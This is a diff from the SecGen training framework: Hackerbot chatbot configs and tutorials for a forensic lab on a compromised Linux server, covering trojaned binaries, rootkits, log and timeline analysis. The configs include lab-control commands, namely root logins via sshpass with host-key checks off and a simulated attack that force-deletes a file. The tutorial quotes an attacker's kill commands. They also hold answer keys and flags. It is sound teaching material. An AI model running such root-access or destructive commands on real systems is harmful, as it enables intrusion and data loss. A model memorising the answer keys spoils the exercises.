$flags = self.flags
REQUIRED_FLAGS = 8
if $flags.length < REQUIRED_FLAGS
Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!"
$flags << "flag{#{SecureRandom.hex}}" while $flags.length < REQUIRED_FLAGS
end
def get_binding
binding
end
%>
<?xml version="1.0"?>
<hackerbot
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/hackerbot">
<!--<hackerbot xmlns="http://www.github/cliffe/SecGen/hackerbotz"-->
<name>Hackerbot</name>
<AIML_chatbot_rules>config/AIML</AIML_chatbot_rules>
<!--Method for gaining shell access, can be overwritten per-attack-->
<!--<get_shell>bash</get_shell>-->
<get_shell>false</get_shell>
<messages>
<show_attack_numbers />
<greeting>Hi there. It seems we have a server that's been compromised. Investigate for me, and I'll give you some flags.</greeting>
<!--Must provide alternatives for each message-->
<say_ready>When you are ready, simply say 'ready'.</say_ready>
<say_ready>'Ready'?</say_ready>
<next>Ok, I'll do what I can to move things along...</next>
<next>Moving things along to the next one...</next>
<previous>Ok, I'll do what I can to back things up...</previous>
<previous>Ok, backing up.</previous>
<goto>Ok, skipping it along.</goto>
<goto>Let me see what I can do to goto that attack.</goto>
<last_attack>That was the last one for now. You can rest easy, until next time... (End.)</last_attack>
<last_attack>That was the last one. Game over?</last_attack>
<first_attack>You are back to the beginning!</first_attack>
<first_attack>This is where it all began.</first_attack>
<getting_shell>Doing my thing...</getting_shell>
<getting_shell>Here we go...</getting_shell>
<got_shell>...</got_shell>
<got_shell>....</got_shell>
<repeat>Let me know when you are 'ready', if you want to move on say 'next', or 'previous' and I'll move things along.</repeat>
<repeat>Say 'ready', 'next', or 'previous'.</repeat>
<!--Single responses:-->
<help>I am waiting for you to say 'ready', 'next', 'previous', 'list', 'goto *X*', or 'answer *X*'</help>
<say_answer>Say "The answer is *X*".</say_answer>
<no_quiz>There is no question to answer</no_quiz>
<correct_answer>Correct</correct_answer>
<incorrect_answer>Incorrect</incorrect_answer>
<invalid>That's not possible.</invalid>
<non_answer>Wouldn't you like to know.</non_answer>
<!--can be overwritten per-attack-->
<shell_fail_message>Oh no. Failed to get shell... You need to let us in.</shell_fail_message>
</messages>
<tutorial_info>
<title>Live Analysis</title>
<tutorial><%= ERB.new(File.read self.templates_path + 'intro.md.erb').result(self.get_binding) %></tutorial>
<footer>
<%= File.read self.templates_path + 'resources.md.erb' %>
<%= File.read self.templates_path + 'license.md.erb' %>
Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%= Time.new.to_s %>)
</footer>
<provide_tutorial>true</provide_tutorial>
</tutorial_info>
<attack>
<% $rand_name1 = SecureRandom.hex(3)
$flag1 = $flags.pop
$flag2 = $flags.pop
%>
<pre_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@{{chat_ip_address}}:/home/<%= $main_user %>/evidence/<%= $rand_name1 %> /tmp/susp_trojans; echo $?; cat /tmp/susp_trojans | sort</pre_shell>
<get_shell>false</get_shell>
<prompt>Create a list of the potentially trojanised executables on the compromised system, save to your Desktop VM in /home/<%= $main_user %>/evidence/<%= $rand_name1 %>. Use full pathnames, one per line.</prompt>
<condition>
<output_matches>/lib/.x/|/root/sslstop/</output_matches>
<message>:( Only include the programs that are typically found on a Linux system, but that seem to have been replaced with Trojan horses.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>/bin/ls.*/bin/netstat.*/bin/ps.*/sbin/ifconfig.*/usr/bin/top</output_matches>
<message>:-D Well done! Two flags for you! <%= $flag1 %>, <%= $flag2 %>.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>/bin/ls|/bin/netstat|/bin/ps|/sbin/ifconfig|/usr/bin/top</output_matches>
<message>:) Well done! <%= $flag1 %>. You have some but not all. There are more flags to be had, by including more.</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>1</output_matches>
<message>:( Failed to get the file.</message>
</condition>
<else_condition>
<message>:( List is incomplete...</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'timeline.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<% $rand_name2 = SecureRandom.hex(3) %>
<pre_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@{{chat_ip_address}}:/home/<%= $main_user %>/evidence/<%= $rand_name2 %> /tmp/susp_pids; echo --$?; cat /tmp/susp_pids</pre_shell>
<get_shell>false</get_shell>
<prompt>Create a list of IP addresses you believe have attempted to log in to the system using SSH or Telnet. Save to your Desktop VM in /home/<%= $main_user %>/evidence/<%= $rand_name2 %>.</prompt>
<condition>
<output_matches>202.85.165.45|192.109.122.5</output_matches>
<message>:) Well done! <%= $flags.pop %>.</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>--1</output_matches>
<message>:( Failed to get file.</message>
</condition>
<else_condition>
<message>:( List is incomplete...</message>
</else_condition>
<% $questions = {'What is the approximate longitude of the IP addresses that have attempted to log in to the system using SSH or Telnet?'=>'4\.|114\.','What countries are the IP addresses that have attempted to log in to the system using SSH or Telnet from?'=>'Hong Kong|Netherlands'}
$rand_question1 = $questions.keys.sample %>
<quiz>
<question><%= $rand_question1 %></question>
<answer><%= $questions[$rand_question1] %></answer>
<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<% $rand_name3 = SecureRandom.hex(3) %>
<pre_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@{{chat_ip_address}}:/home/<%= $main_user %>/evidence/<%= $rand_name3 %> /tmp/susp_email; echo $?; cat /tmp/susp_email</pre_shell>
<get_shell>false</get_shell>
<prompt>Save the email addresses that messages were sent to. Save to your Desktop VM in /home/<%= $main_user %>/evidence/<%= $rand_name3 %>.</prompt>
<condition>
<output_matches>newtraceuser@yahoo.com|skiZophrenia_siCk@yahoo.com|jijeljijel@yahoo.com</output_matches>
<message>:) Well done! <%= $flags.pop %>.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>1</output_matches>
<message>:( Failed to get the file.</message>
</condition>
<else_condition>
<message>:( Something was not right...</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'logs.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<% $rand_name4 = SecureRandom.hex(3) %>
<pre_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@{{chat_ip_address}}:/home/<%= $main_user %>/evidence/<%= $rand_name4 %> /tmp/susp_wget; echo $?; cat /tmp/susp_wget</pre_shell>
<get_shell>false</get_shell>
<prompt>Save the wget commands used to download rootkits. Save to your Desktop VM in /home/<%= $main_user %>/evidence/<%= $rand_name4 %>.</prompt>
<condition>
<output_matches>wget geocities.com</output_matches>
<message>:) Well done! <%= $flags.pop %>.</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>1</output_matches>
<message>:( Failed to get the file.</message>
</condition>
<else_condition>
<message>:( List is incomplete...</message>
</else_condition>
<quiz>
<question>What country is the attacker likely from?</question>
<answer>Romania</answer>
<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
<tutorial><%= ERB.new(File.read self.templates_path + 'deleted.md.erb').result(self.get_binding) %></tutorial>
</attack>
</hackerbot>


@@ -0,0 +1,121 @@
<html>
<head>
<title><%= self.title %></title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css/github-markdown.css">
</head>
<body>
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
max-width: 980px;
margin: 0 auto;
padding: 45px;
}
.markdown-body h4[id^='hackerbot']:after {
display: inline-block;
float: right;
content: url("images/skullandusb.svg");
width: 30px;
}
article {
float: right;
width: calc(100% - 300px);
}
.toc {
float: left;
font-size: smaller;
color: #1a1d22;
width: 300px;
position: fixed;
height: calc(100% - 56px);
overflow-y: scroll;
font-family: sans-serif;
margin-top: 50px;
}
.toc ul {
list-style-type: none;
padding: 0;
margin-left: 1em;
}
.toc li { /* Space between menu items*/
margin: 1em 0;
}
.toc a {
color: #1a1d22;
text-decoration: none;
}
.toc a:hover {
color: #6c036d;
text-decoration: none;
}
.toc a:visited {
color: #1a1d22;
text-decoration: none;
}
.markdown-body pre {
background-color: #570138;
color: whitesmoke;
}
.markdown-body p code span {
color: black !important;
}
.markdown-body p code {
background-color: whitesmoke;
border: 1px solid #eaecef;
}
.markdown-body img[alt="small-left"] {
max-width: 100px;
float: left;
}
.markdown-body img[alt="small-right"] {
max-width: 100px;
float: right;
}
.markdown-body img[alt="tiny-right"] {
max-width: 30px;
float: right;
}
.markdown-body img[alt="small"] {
max-width: 100px;
display: block;
margin-left: auto;
margin-right: auto;
padding: 15px;
}
mark {
background-color: white;
color: #5b29bd;
font-weight: bolder;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
min-width: 200px;
max-width: 980px;
}
.toc {
float: none;
width: 100%;
position: relative;
overflow: auto;
height: auto;
}
article {
float: none;
width: 100%;
}
}
</style>
<div class="toc">
<%= self.html_TOC_rendered %>
</div>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js?autoload=true&amp;skin=sunburst&amp;lang=css"></script>
</body>
</html>


@@ -0,0 +1,6 @@
## License
This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.
![small](images/leedsbeckett-logo.png)


@@ -0,0 +1,69 @@
## Logs analysis
As you learned in the Log Management topic, the most common logging system on Unix systems is Syslog, which is typically configured in /etc/syslog.conf (or similar, such as rsyslog). Within the Autopsy File Analysis browser, ==navigate to this configuration file and view its contents.== Note that most logging is configured to go to /var/log/messages. Some security messages are logged to /var/log/secure. Boot messages are logged to /var/log/boot.log.
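For reference, entries in syslog.conf pair a selector (facility.priority) with a destination. Lines of roughly the following shape produce the log files mentioned above (illustrative only, not the exact contents of the evidence file):

```shell
# Illustrative syslog.conf-style entries (selector, then destination file):
cat <<'EOF'
*.info;mail.none;authpriv.none    /var/log/messages
authpriv.*                        /var/log/secure
local7.*                          /var/log/boot.log
EOF
```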
==Make a note of where mail messages are logged==, you will use this later:
Within Autopsy, browse to /var/log. Note that you cannot view the messages file, which would have contained many helpful log entries. Click the inode number to the right (47173):
As previously seen in the timeline, this file has been symlinked to /dev/null. If you are not familiar with /dev/null, search the Internet for an explanation.
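The effect of such a symlink is easy to reproduce safely (hypothetical file name): anything appended to the "log" is silently discarded, which is exactly why attackers point log files at /dev/null.

```shell
# Point a fake log file at /dev/null, then try to log to it:
ln -sf /dev/null /tmp/messages.demo
echo 'this log entry is discarded' >> /tmp/messages.demo
readlink /tmp/messages.demo   # -> /dev/null
cat /tmp/messages.demo        # prints nothing: the data was never stored
```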
For now, we will continue by investigating the files that are available, and later investigate deleted files.
Using Autopsy, ==view the /var/log/secure file==, and identify any IP addresses that have attempted to log in to the system using SSH or Telnet.
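When a log is large, it helps to extract and deduplicate remote IP addresses mechanically. A sketch against a fabricated /var/log/secure-style sample (line format approximated; the addresses below are from the reserved documentation ranges, not the actual evidence):

```shell
# Fabricated sample log entries in roughly the sshd/telnetd format:
cat > /tmp/secure.sample <<'EOF'
Aug 10 13:24:01 host sshd[2010]: Failed password for root from 203.0.113.7 port 4102 ssh2
Aug 10 13:25:19 host in.telnetd[2031]: connect from 198.51.100.23
Aug 10 13:26:40 host sshd[2044]: Failed password for root from 203.0.113.7 port 4108 ssh2
EOF
# Extract every dotted-quad and deduplicate:
grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' /tmp/secure.sample | sort -u
```

The same pipeline run against the real secure log (exported from Autopsy) gives you the candidate list to investigate.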
==Determine the country of origin for each of these connection attempts:==
> On a typical Unix system we can look up this information using the command:
```bash
whois *IP-address*
```
> (Where IP-address is the IP address being investigated).
>
> However, this may not be possible from within our lab environment; alternatively, there are a number of websites that can be used (potentially from your own host PC):
>
> [*http://whois.domaintools.com/*](http://whois.domaintools.com/)
>
> [*http://whois.net/ip-address-lookup/*](http://whois.net/ip-address-lookup/)
>
> You may also run a traceroute to determine what routers lie between your system and the remote system.
>
> Additionally, software and websites exist that will graphically approximate the location of the IP:
>
> [*http://www.iplocationfinder.com/*](http://www.iplocationfinder.com/)
---
Within Autopsy, ==view the /var/log/boot.log file==. At the top of this file Syslog reports starting at August 10 at 13:33:57.
==LogBook Question: Given what we have learned about this system during timeline analysis, what is suspicious about Syslog restarting on August 10th? Was the system actually restarted at that time?==
Note that according to the log, Apache fails to restart. Why can't Apache restart? Do you think the attacker intended to do this?
==Open the mail log file==, which you recorded the location of earlier. ==Identify the email addresses that messages were sent to.==
---
Another valuable source of information are records of commands that have been run by users. One source of this information is the .bash\_history file. As noted during timeline analysis, the /root/.bash\_history file was symlinked to /dev/null, meaning the history was not saved. However, the attacker did leave behind a Bash history file in the root of the filesystem ("/"). ==View this file.==
Towards the end of this short Bash session the attacker downloads sslstop.tar.gz, then the attacker runs:
```bash
ps aux | grep apache
kill -9 21510 21511 23289 23292 23302
```
==LogBook Question: What is the attacker attempting to do with these commands?==
Apache has clearly played an important role in the activity of the attacker, so it is natural to investigate Apache's configuration and logs.
Still in Autopsy, ==browse to /etc/httpd/conf/, and view httpd.conf.==
Note that the Apache config has been altered by sslstop, changing the "HAVE\_SSL" directive to "HAVE\_SSS" (remember, this file was shown in the timeline to be modified after sslstop was run).
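The edit sslstop makes can be mimicked with sed on a toy config (directive name from the lab; the file path and contents here are hypothetical):

```shell
# A minimal stand-in for the SSL-guarded section of an Apache 1.3 config:
printf '<IfDefine HAVE_SSL>\nLoadModule ssl_module modules/libssl.so\n</IfDefine>\n' > /tmp/httpd.conf.demo
sed -i 's/HAVE_SSL/HAVE_SSS/' /tmp/httpd.conf.demo
grep HAVE_ /tmp/httpd.conf.demo   # guard is now HAVE_SSS, which is never defined, so the SSL block is skipped
```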
This configuration also specifies that Apache logs are stored in /etc/httpd/logs, and upon investigation this location is symlinked to /var/log/httpd/. This is a common Apache configuration.
Unfortunately the /var/log/httpd/ directory does not exist, so clearly the attacker has attempted to cover their tracks by deleting Apache's log files.

File diff suppressed because one or more lines are too long


@@ -0,0 +1,62 @@
### Timeline analysis
It helps to reconstruct the timeline of events on the system, to get a better understanding. Software such as the Sleuth Kit (either using the Autopsy frontend or the mactime command-line tool) analyses the MAC times of files (that is, the most recent modification, most recent access, and most recent inode change[^1]) to reconstruct a sequence of file access events.
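The three timestamps can be inspected on any file with GNU stat (hypothetical file):

```shell
touch /tmp/mac_demo
# %y = last modification, %x = last access, %z = last inode (metadata) change:
stat -c 'modify (M): %y%naccess (A): %x%nchange (C): %z' /tmp/mac_demo
```

Timeline tools simply collect these three values for every file and sort the events chronologically.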
In another Firefox tab, ==visit [*http://localhost:9999/autopsy*](http://localhost:9999/autopsy), click "Open Case", "Ok", "Ok".==
==Click "File Activity Timelines".==
==Click "Create Data File".==
==Select "/1/ hda1.img-0-0 ext".==
==Click "Ok".==
==Click "Ok".==
For "5. Select the UNIX image that contains the /etc/passwd and /etc/group files", ==select "hda1.img-0-0".==
Wait while a timeline is generated.
==Click "Ok".==
Once analysis is complete, the timeline is presented. Note that the timeline starts with files accessed on Jan 01 1970.
==Click "Summary".==
A number of files are specified as accessed on Jan 01 1970. What is special about this date?
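Recall that Unix stores timestamps as seconds since 00:00:00 UTC on 1 January 1970 (the "epoch"), so a zeroed or missing timestamp renders as that date. With GNU date:

```shell
# Render timestamp 0: the Unix epoch, 1 January 1970 (UTC)
date -u -d @0
```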
==Browse through the history.== Note that it is very detailed, and it is easy to get lost (and waste time) in irrelevant detail.
The access date you previously recorded (for "/lib/.x/.boot") was in August 2003, so this is probably a good place to start.
==Browse to August 2003 on the timeline==, and follow along:
Note that on the 6th of August it seems many files were accessed, and not altered (displayed as ".a.."[^2]). This is probably the point at which the md5 hashes of all the files on the system were collected.
On 9th August a number of config files were accessed including "/sbin/runlevel", "/sbin/ipchains", and "/bin/login". This indicates that the system was likely rebooted at this time.
On 10th August, a number of files that have since been deleted were accessed.
Shortly thereafter the inode data was changed (displayed as "..c.") for many files. Then many files owned by the *apache* user were last modified before they were deleted. The apache user goes on to access some more files, and then a number of header files (.h) were accessed, presumably in order to compile a C program from source. Directly after, some files were created, including "/usr/lib/adore", the Adore rootkit.
At 23:30:54 /root/.bash\_history and /var/log/messages were symlinked to /dev/null.
Next more header files were accessed, this time Linux kernel headers, presumably to compile a kernel module (or perhaps some code that tries to tamper with the kernel). This was followed by the creation of the SuckIT rootkit files, which we previously investigated.
Note that a number of these newly created files are again owned by the "apache" user.
What does this tell you about the likely source of the compromise?
Further down, note the creation of the /root/sslstop.tar.gz file which was extracted (files created), then compiled and run. Shortly after, the Apache config file (/etc/httpd/conf/httpd.conf) was modified.
Why would an attacker, after compromising a system, want to stop SSL support in Apache?
Meanwhile the attacker has accidentally created a /.bash\_history file, which has not been deleted.
Further down we see wget accessed and used to download the /etc/opt/psyBNC2.3.1.tar.gz file, which we investigated earlier.
This file was then extracted, and the program compiled. This involved accessing many header (.h) files. Finally, the "/etc/opt/psybnc/psybnc.conf" file is modified, presumably by the attacker, in order to configure the behaviour of the program.
---


@@ -0,0 +1,83 @@
<?xml version="1.0"?>
<hackerbot xmlns="http://www.github/cliffe/SecGen/hackerbotz"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/hackerbot">
<name>Bob</name>
<AIML_chatbot_rules>config/AIML</AIML_chatbot_rules>
<!--Method for gaining shell access, can be overwritten per-attack-->
<!--<get_shell>bash</get_shell>-->
<get_shell>sshpass -p randompassword ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash</get_shell>
<messages>
<greeting>Hi there. Just to introduce myself, I also work here.</greeting>
<!--Must provide alternatives for each message-->
<say_ready>Let me know when you are 'ready', if you want to move on to another attack, say 'next', or 'previous' and I'll move things along</say_ready>
<say_ready>When you are ready, simply say 'ready'.</say_ready>
<say_ready>'Ready'?</say_ready>
<say_ready>Better hurry, the attack is imminent... Let me know when you're 'ready'.</say_ready>
<next>Ok, I'll do what I can to move things along...</next>
<next>Moving things along to the next attack...</next>
<next>Ok, next attack...</next>
<previous>Ok, I'll do what I can to back things up...</previous>
<previous>Ok, previous attack...</previous>
<previous>Ok, backing up.</previous>
<goto>Ok, skipping it along.</goto>
<goto>Let me see what I can do to goto that attack.</goto>
<last_attack>That was the last attack for now. You can rest easy, until next time... (End.)</last_attack>
<last_attack>That was the last attack. Game over?</last_attack>
<first_attack>You are back to the beginning!</first_attack>
<first_attack>This is where it all began.</first_attack>
<getting_shell>Ok. Gaining shell access, and running post command...</getting_shell>
<getting_shell>Hacking in progress...</getting_shell>
<getting_shell>Attack underway...</getting_shell>
<getting_shell>Here we go...</getting_shell>
<got_shell>We are in to your system.</got_shell>
<got_shell>You are pwned.</got_shell>
<got_shell>We have shell.</got_shell>
<repeat>Let me know when you are 'ready', if you want to move on to another attack, say 'next', or 'previous' and I'll move things along</repeat>
<repeat>Say 'ready', 'next', or 'previous'.</repeat>
<!--Single responses:-->
<help>I am waiting for you to say 'ready', 'next', 'previous', 'list', 'goto *X*', or 'answer *X*'</help>
<say_answer>Say "The answer is *X*".</say_answer>
<no_quiz>There is no question to answer</no_quiz>
<correct_answer>Correct</correct_answer>
<incorrect_answer>Incorrect</incorrect_answer>
<invalid>That's not possible.</invalid>
<non_answer>Don't ask me. I just work here.</non_answer>
<!--can be overwritten per-attack-->
<shell_fail_message>Oh no. Failed to get shell... You need to let us in.</shell_fail_message>
</messages>
<attack>
<prompt>An attempt to delete /home/dropbear/trade_secrets/credit_card is coming. Stop the attack using access controls.</prompt>
<post_command>rm --interactive=never /home/dropbear/trade_secrets/credit_card; echo $?</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted</output_matches>
<message>:) Well done!</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_equals>0</output_equals>
<message>:( We managed to delete your file! You need to use access controls to protect the file.</message>
</condition>
<condition>
<output_matches>No such file or directory</output_matches>
<message>:( The file should exist!</message>
</condition>
<else_condition>
<message>:( Something was not right...</message>
</else_condition>
</attack>
</hackerbot>


@@ -0,0 +1,39 @@
#!/usr/bin/ruby
require_relative '../../../../../../lib/objects/local_string_generator.rb'
require 'erb'
require 'fileutils'
class HackerbotConfigGenerator < StringGenerator
attr_accessor :accounts
attr_accessor :flags
attr_accessor :root_password
LOCAL_DIR = File.expand_path('../../',__FILE__)
FILE_PATH = "#{LOCAL_DIR}/files/example_bot.xml"
def initialize
super
self.module_name = 'Hackerbot Config Generator'
self.accounts = []
self.flags = []
self.root_password = ''
end
def get_options_array
super + [['--root_password', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--root_password'
self.root_password = arg
end
end
def generate
self.outputs << File.read(FILE_PATH)
end
end
HackerbotConfigGenerator.new.run


@@ -0,0 +1,22 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Hackerbot config for an example bot</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Generates a config file for a basic example config for hackerbot.</description>
<type>hackerbot_config</type>
<platform>linux</platform>
<read_fact>root_password</read_fact>
<default_input into="root_password">
<value>puppet</value>
</default_input>
<output_type>hackerbot</output_type>
</generator>

Some files were not shown because too many files have changed in this diff.